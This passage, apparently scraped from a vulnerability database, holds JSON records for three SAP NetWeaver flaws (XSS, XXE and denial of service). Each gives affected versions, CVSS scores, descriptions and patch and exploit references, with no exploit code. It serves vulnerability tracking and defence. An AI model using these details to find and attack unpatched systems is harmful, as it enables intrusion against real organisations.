"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:751:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:752:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:753:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:754:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:755:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:756:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22534"
}
]
},
"cve": "CVE-2022-22534",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-22534",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2022-22534",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-22534",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202202-565",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2022-22534",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-22534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "NVD",
"id": "CVE-2022-22534"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application. SAP NetWeaver Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "VULMON",
"id": "CVE-2022-22534"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-22534",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2022-005424",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202202-565",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-22534",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-22534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "NVD",
"id": "CVE-2022-22534"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
]
},
"id": "VAR-202202-0556",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:34:40.166000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP\u00a0Security\u00a0Patch\u00a0Day\u00a0-\u00a0May\u00a02023",
"trust": 0.8,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"title": "SAP Netweaver Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=182435"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2022-22534 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-22534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "NVD",
"id": "CVE-2022-22534"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/3124994"
},
{
"trust": 1.7,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22534"
},
{
"trust": 0.6,
"url": "https://wiki.scn.sap.com/wiki/display/psr/sap+security+patch+day+-+february+2022"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-de-decembre-2021-37478"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2022-22534"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-22534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "NVD",
"id": "CVE-2022-22534"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2022-22534"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "NVD",
"id": "CVE-2022-22534"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-09T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22534"
},
{
"date": "2023-05-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"date": "2022-02-09T23:15:18.533000",
"db": "NVD",
"id": "CVE-2022-22534"
},
{
"date": "2022-02-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-27T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22534"
},
{
"date": "2023-05-30T08:47:00",
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"date": "2022-10-27T01:10:54.553000",
"db": "NVD",
"id": "CVE-2022-22534"
},
{
"date": "2022-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0NetWeaver\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-565"
}
],
"trust": 0.6
}
}
var-201709-0026
Vulnerability from variot
XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01. Successfully exploiting this issue may allow an attacker to gain unauthorized access and perform unauthorized actions; this may aid in further attacks. Versions prior to SAP Netwaver 7.01 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0026",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "lt",
"trust": 0.8,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netwaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "ne",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
}
],
"sources": [
{
"db": "BID",
"id": "76809"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7241"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Lukasz Miedzinski",
"sources": [
{
"db": "BID",
"id": "76809"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
],
"trust": 0.9
},
"cve": "CVE-2015-7241",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-7241",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2015-7241",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-7241",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201510-656",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01. \nSuccessfully exploiting this issue may allow an attacker to gain unauthorized access and perform unauthorized actions; this may aid in further attacks. \nVersions prior to SAP Netwaver 7.01 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"db": "BID",
"id": "76809"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-7241",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "133627",
"trust": 2.4
},
{
"db": "BID",
"id": "76809",
"trust": 1.9
},
{
"db": "EXPLOIT-DB",
"id": "38261",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007831",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201510-656",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "76809"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
]
},
"id": "VAR-201709-0026",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:29:29.559000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sap.com/index.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-611",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"db": "NVD",
"id": "CVE-2015-7241"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/133627/sap-netweaver-xml-external-entity-injection.html"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/76809"
},
{
"trust": 1.6,
"url": "https://www.exploit-db.com/exploits/38261/"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/536504/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7241"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7241"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/536504/100/0/threaded"
},
{
"trust": 0.3,
"url": "https://help.sap.com/nw_platform"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/https://service.sap.com/sap/support/notes/2098608"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2015/sep/85"
}
],
"sources": [
{
"db": "BID",
"id": "76809"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "76809"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-21T00:00:00",
"db": "BID",
"id": "76809"
},
{
"date": "2017-09-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"date": "2017-09-06T21:29:00.990000",
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"date": "2015-09-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-21T00:00:00",
"db": "BID",
"id": "76809"
},
{
"date": "2017-09-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007831"
},
{
"date": "2018-10-09T19:58:00.440000",
"db": "NVD",
"id": "CVE-2015-7241"
},
{
"date": "2017-09-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver In XML External entity vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007831"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201510-656"
}
],
"trust": 0.6
}
}
var-202306-1289
Vulnerability from variot
SAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202306-1289",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "740"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "757"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "755"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "731"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "750"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "702"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "753"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "752"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "754"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "756"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "751"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-32114"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:751:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:752:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:753:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:754:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:755:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:756:*:*:*:*:*:*:*",
